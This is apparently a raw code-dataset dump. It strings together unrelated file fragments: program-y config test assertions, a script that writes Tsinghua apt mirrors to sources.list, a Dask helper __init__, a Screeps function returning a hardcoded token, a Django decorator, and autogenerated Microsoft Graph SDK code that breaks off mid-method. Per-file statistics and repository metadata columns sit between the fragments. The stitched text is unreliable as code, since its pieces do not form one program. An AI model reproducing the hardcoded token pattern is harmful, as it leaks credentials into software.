self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.errors.filename, "/tmp/y-bot_errors.txt")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.duplicates.filename, "/tmp/y-bot_duplicates.txt")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.aiml_files.conversation.filename, "/tmp/y-bot_conversation.txt")
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].files.set_files)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.set_files.files, ["./test-sets"])
self.assertIsNone(configuration.client_configuration.configurations[0].configurations[0].files.set_files.file)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.set_files.extension, ".test-txt")
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].files.set_files.directories)
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].files.map_files)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.map_files.files, ["./test-maps"])
self.assertIsNone(configuration.client_configuration.configurations[0].configurations[0].files.map_files.file)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.map_files.extension, ".test-txt")
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].files.map_files.directories)
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.denormal, "./config/test-denormal.txt")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.normal, "./config/test-normal.txt")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.gender, "./config/test-gender.txt")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.person, "./config/test-person.txt")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.person2, "./config/test-person2.txt")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.properties, "./config/test-properties.txt")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.triples, "./config/test-triples.txt")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.preprocessors, "./config/test-preprocessors.conf")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.postprocessors, "./config/test-postprocessors.conf")
self.assertEqual(configuration.client_configuration.configurations[0].configurations[0].files.regex_templates, "./config/regex-templates.txt")
self.assertIsNotNone(configuration.client_configuration.configurations[0].configurations[0].services)
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].services.exists('REST'))
rest_config =configuration.client_configuration.configurations[0].configurations[0].services.service('REST')
self.assertEqual("programy.services.rest.GenericRESTService", rest_config.classname)
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].services.exists('Pannous'))
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].services.exists('Pandora'))
self.assertTrue(configuration.client_configuration.configurations[0].configurations[0].services.exists('Wikipedia'))
self.assertFalse(configuration.client_configuration.configurations[0].configurations[0].services.exists('Other'))
self.assertIsNotNone(configuration.client_configuration.configurations)
self.assertEqual(configuration.client_configuration.configurations[0].initial_question, "Hi, how can I help you test today?")
self.assertEqual(configuration.client_configuration.configurations[0].default_response, "Sorry, I don't have a test answer for that!")
self.assertEqual(configuration.client_configuration.configurations[0].empty_string, "TEST-YEMPTY")
self.assertEqual(configuration.client_configuration.configurations[0].exit_response, "So long, and thanks for the test fish!")
self.assertTrue(configuration.client_configuration.configurations[0].override_properties)
self.assertEqual(configuration.client_configuration.configurations[0].max_question_recursion, 1000)
self.assertEqual(configuration.client_configuration.configurations[0].max_question_timeout, 60)
self.assertEqual(configuration.client_configuration.configurations[0].max_search_depth, 100)
self.assertEqual(configuration.client_configuration.configurations[0].max_search_timeout, 60)
self.assertIsNotNone(configuration.client_configuration.configurations[0].spelling)
self.assertEqual(configuration.client_configuration.configurations[0].spelling.section_name, "spelling")
self.assertEqual(configuration.client_configuration.configurations[0].spelling.classname, "programy.spelling.checker.TestSpellingChecker")
self.assertEqual(configuration.client_configuration.configurations[0].spelling.corpus, "./spelling/test-corpus.txt")
self.assertTrue(configuration.client_configuration.configurations[0].spelling.check_before)
self.assertTrue(configuration.client_configuration.configurations[0].spelling.check_and_retry)
self.assertIsNotNone(configuration.client_configuration)
self.assertEqual(configuration.client_configuration.section_name, "console")
| 91.780952
| 166
| 0.803362
| 999
| 9,637
| 7.605606
| 0.129129
| 0.254672
| 0.315873
| 0.441958
| 0.836668
| 0.823769
| 0.815215
| 0.765859
| 0.7398
| 0.599105
| 0
| 0.016054
| 0.082183
| 9,637
| 104
| 167
| 92.663462
| 0.842962
| 0
| 0
| 0
| 0
| 0
| 0.087787
| 0.053855
| 0
| 0
| 0
| 0
| 0.9625
| 1
| 0.0125
| false
| 0
| 0.0125
| 0
| 0.0375
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5a40df2bbca7b2cdc9ab921c351855ab8dd69ce8
| 2,892
|
py
|
Python
|
open_source_mirror/ubuntu.py
|
fujiawei-dev/tookit-py
|
5ab3a18a41885f6166150cc27183621b96f8f991
|
[
"BSD-3-Clause"
] | null | null | null |
open_source_mirror/ubuntu.py
|
fujiawei-dev/tookit-py
|
5ab3a18a41885f6166150cc27183621b96f8f991
|
[
"BSD-3-Clause"
] | null | null | null |
open_source_mirror/ubuntu.py
|
fujiawei-dev/tookit-py
|
5ab3a18a41885f6166150cc27183621b96f8f991
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Date: 2022.02.13 13:41
Description: Omit
LastEditors: Rustle Karl
LastEditTime: 2022.02.13 13:41
"""
from enum import Enum
from create_config_file.common import writer
class Version(str, Enum):
LTS1604 = "xenial"
LTS1804 = "bionic"
LTS2004 = "focal"
def ubuntu(version=Version.LTS2004):
"""x86 amd64"""
sources = open("/etc/apt/sources.list").read()
for version in Version:
if version in sources:
break
print(f"version: {version}")
content = f"""deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version} main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version} main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-updates main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-updates main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-backports main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-backports main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-security main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ {version}-security main restricted universe multiverse"""
conf = "/etc/apt/sources.list"
writer(
conf,
content=content,
read_only=False,
official="https://mirrors.tuna.tsinghua.edu.cn/help/ubuntu/",
)
def ubuntu_port(version=Version.LTS2004):
"""arm64 armhf ppc64el riscv64 s390x"""
sources = open("/etc/apt/sources.list").read()
for version in Version:
if version in sources:
break
print(f"version: {version}")
content = f"""deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version} main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version} main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-updates main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-updates main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-backports main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-backports main restricted universe multiverse
deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-security main restricted universe multiverse
# deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ {version}-security main restricted universe multiverse"""
conf = "/etc/apt/sources.list"
writer(
conf,
content=content,
read_only=False,
official="https://mirrors.tuna.tsinghua.edu.cn/help/ubuntu-ports/",
)
| 40.166667
| 118
| 0.728216
| 379
| 2,892
| 5.543536
| 0.189974
| 0.102808
| 0.137078
| 0.205616
| 0.871014
| 0.859591
| 0.859591
| 0.859591
| 0.859591
| 0.859591
| 0
| 0.022956
| 0.141425
| 2,892
| 71
| 119
| 40.732394
| 0.823198
| 0.048409
| 0
| 0.416667
| 0
| 0.333333
| 0.717996
| 0.030724
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.041667
| 0
| 0.166667
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5a5c847c06a9e332c987001c361529b2ebc90702
| 160
|
py
|
Python
|
src/minimaldask/__init__.py
|
heikowagner/minimaldask
|
7b348776d012c86016c17af186f98f4ba8f6ac4e
|
[
"Apache-2.0"
] | 2
|
2021-08-03T17:03:20.000Z
|
2021-11-28T03:07:36.000Z
|
src/minimaldask/__init__.py
|
heikowagner/minimaldask
|
7b348776d012c86016c17af186f98f4ba8f6ac4e
|
[
"Apache-2.0"
] | 2
|
2021-04-07T14:56:58.000Z
|
2021-04-11T09:46:25.000Z
|
src/minimaldask/__init__.py
|
heikowagner/minimaldask
|
7b348776d012c86016c17af186f98f4ba8f6ac4e
|
[
"Apache-2.0"
] | 5
|
2021-04-06T01:54:54.000Z
|
2021-11-28T03:31:30.000Z
|
from .kubernetes_helper import start_dask_cluster, delete_dask_cluster, update_or_deploy
__all__ = [start_dask_cluster, delete_dask_cluster, update_or_deploy]
| 40
| 88
| 0.875
| 23
| 160
| 5.347826
| 0.521739
| 0.357724
| 0.260163
| 0.357724
| 0.764228
| 0.764228
| 0.764228
| 0.764228
| 0.764228
| 0
| 0
| 0
| 0.075
| 160
| 3
| 89
| 53.333333
| 0.831081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
ce905ec86445403e13a9ec4a7abc09ff16b9ac73
| 67
|
py
|
Python
|
pythonCode/token_screeps.py
|
Ureimu/screeps-DataVisualization
|
59048381f371ae68412d85cd57300a415a40ae28
|
[
"Unlicense"
] | null | null | null |
pythonCode/token_screeps.py
|
Ureimu/screeps-DataVisualization
|
59048381f371ae68412d85cd57300a415a40ae28
|
[
"Unlicense"
] | 1
|
2020-08-28T12:38:19.000Z
|
2020-08-28T12:39:07.000Z
|
pythonCode/token_screeps.py
|
Ureimu/screeps-DataVisualization
|
59048381f371ae68412d85cd57300a415a40ae28
|
[
"Unlicense"
] | null | null | null |
def get_token():
return "f805ec52-3e13-445f-b673-407a337f8e6f"
| 22.333333
| 49
| 0.746269
| 9
| 67
| 5.444444
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.372881
| 0.119403
| 67
| 2
| 50
| 33.5
| 0.457627
| 0
| 0
| 0
| 0
| 0
| 0.537313
| 0.537313
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
ce9716149c90d73c38b388d27620edede2db08ca
| 182
|
py
|
Python
|
apps/cpq/decorators.py
|
goztrk/django-htk
|
c56bf112e5d627780d2f4288460eae5cce80fa9e
|
[
"MIT"
] | 206
|
2015-10-15T07:05:08.000Z
|
2021-02-19T11:48:36.000Z
|
apps/cpq/decorators.py
|
goztrk/django-htk
|
c56bf112e5d627780d2f4288460eae5cce80fa9e
|
[
"MIT"
] | 8
|
2017-10-16T10:18:31.000Z
|
2022-03-09T14:24:27.000Z
|
apps/cpq/decorators.py
|
goztrk/django-htk
|
c56bf112e5d627780d2f4288460eae5cce80fa9e
|
[
"MIT"
] | 61
|
2015-10-15T08:12:44.000Z
|
2022-03-10T12:25:06.000Z
|
# Django Imports
from django.contrib.admin.views.decorators import staff_member_required
def cpq_admin_required(*args, **kwargs):
return staff_member_required(*args, **kwargs)
| 26
| 71
| 0.796703
| 24
| 182
| 5.791667
| 0.666667
| 0.158273
| 0.273381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104396
| 182
| 6
| 72
| 30.333333
| 0.852761
| 0.076923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
ce9e21c63c3283a8b116fa5616b525157058487b
| 73,528
|
py
|
Python
|
msgraph-cli-extensions/v1_0/identitydirmgt_v1_0/azext_identitydirmgt_v1_0/vendored_sdks/identitydirmgt/aio/operations/_contacts_operations.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
msgraph-cli-extensions/v1_0/identitydirmgt_v1_0/azext_identitydirmgt_v1_0/vendored_sdks/identitydirmgt/aio/operations/_contacts_operations.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | 22
|
2022-03-29T22:54:37.000Z
|
2022-03-29T22:55:27.000Z
|
msgraph-cli-extensions/v1_0/identitydirmgt_v1_0/azext_identitydirmgt_v1_0/vendored_sdks/identitydirmgt/aio/operations/_contacts_operations.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ContactsOperations:
"""ContactsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~identity_directory_management.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_direct_reports(
self,
org_contact_id: str,
orderby: Optional[List[Union[str, "models.Enum6"]]] = None,
select: Optional[List[Union[str, "models.Enum7"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> AsyncIterable["models.CollectionOfDirectoryObject"]:
"""Get directReports from contacts.
Get directReports from contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_directory_management.models.Enum6]
:param select: Select properties to be returned.
:type select: list[str or ~identity_directory_management.models.Enum7]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfDirectoryObject or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfDirectoryObject]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfDirectoryObject"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_direct_reports.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfDirectoryObject', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_direct_reports.metadata = {'url': '/contacts/{orgContact-id}/directReports'} # type: ignore
def list_ref_direct_reports(
self,
org_contact_id: str,
orderby: Optional[List[Union[str, "models.Enum8"]]] = None,
**kwargs
) -> AsyncIterable["models.CollectionOfLinksOfDirectoryObject"]:
"""Get ref of directReports from contacts.
Get ref of directReports from contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_directory_management.models.Enum8]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfLinksOfDirectoryObject or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_directory_management.models.CollectionOfLinksOfDirectoryObject]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfLinksOfDirectoryObject"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_ref_direct_reports.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfLinksOfDirectoryObject', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_ref_direct_reports.metadata = {'url': '/contacts/{orgContact-id}/directReports/$ref'} # type: ignore
async def create_ref_direct_reports(
self,
org_contact_id: str,
body: Dict[str, object],
**kwargs
) -> Dict[str, object]:
"""Create new navigation property ref to directReports for contacts.
Create new navigation property ref to directReports for contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param body: New navigation property ref value.
:type body: dict[str, object]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: dict mapping str to object, or the result of cls(response)
:rtype: dict[str, object]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Dict[str, object]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_ref_direct_reports.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, '{object}')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('{object}', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_ref_direct_reports.metadata = {'url': '/contacts/{orgContact-id}/directReports/$ref'} # type: ignore
async def get_manager(
self,
org_contact_id: str,
select: Optional[List[Union[str, "models.Enum9"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> "models.MicrosoftGraphDirectoryObject":
"""Get manager from contacts.
Get manager from contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_directory_management.models.Enum9]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphDirectoryObject, or the result of cls(response)
:rtype: ~identity_directory_management.models.MicrosoftGraphDirectoryObject
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphDirectoryObject"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_manager.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphDirectoryObject', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_manager.metadata = {'url': '/contacts/{orgContact-id}/manager'} # type: ignore
async def get_ref_manager(
self,
org_contact_id: str,
**kwargs
) -> str:
"""Get ref of manager from contacts.
Get ref of manager from contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: str, or the result of cls(response)
:rtype: str
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[str]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_ref_manager.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('str', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_ref_manager.metadata = {'url': '/contacts/{orgContact-id}/manager/$ref'} # type: ignore
async def set_ref_manager(
self,
org_contact_id: str,
body: Dict[str, object],
**kwargs
) -> None:
"""Update the ref of navigation property manager in contacts.
Update the ref of navigation property manager in contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param body: New navigation property ref values.
:type body: dict[str, object]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.set_ref_manager.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, '{object}')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
set_ref_manager.metadata = {'url': '/contacts/{orgContact-id}/manager/$ref'} # type: ignore
async def delete_ref_manager(
self,
org_contact_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete ref of navigation property manager for contacts.
Delete ref of navigation property manager for contacts.
:param org_contact_id: key: id of orgContact.
:type org_contact_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_ref_manager.metadata['url'] # type: ignore
path_format_arguments = {
'orgContact-id': self._serialize.url("org_contact_id", org_contact_id, 'str'),
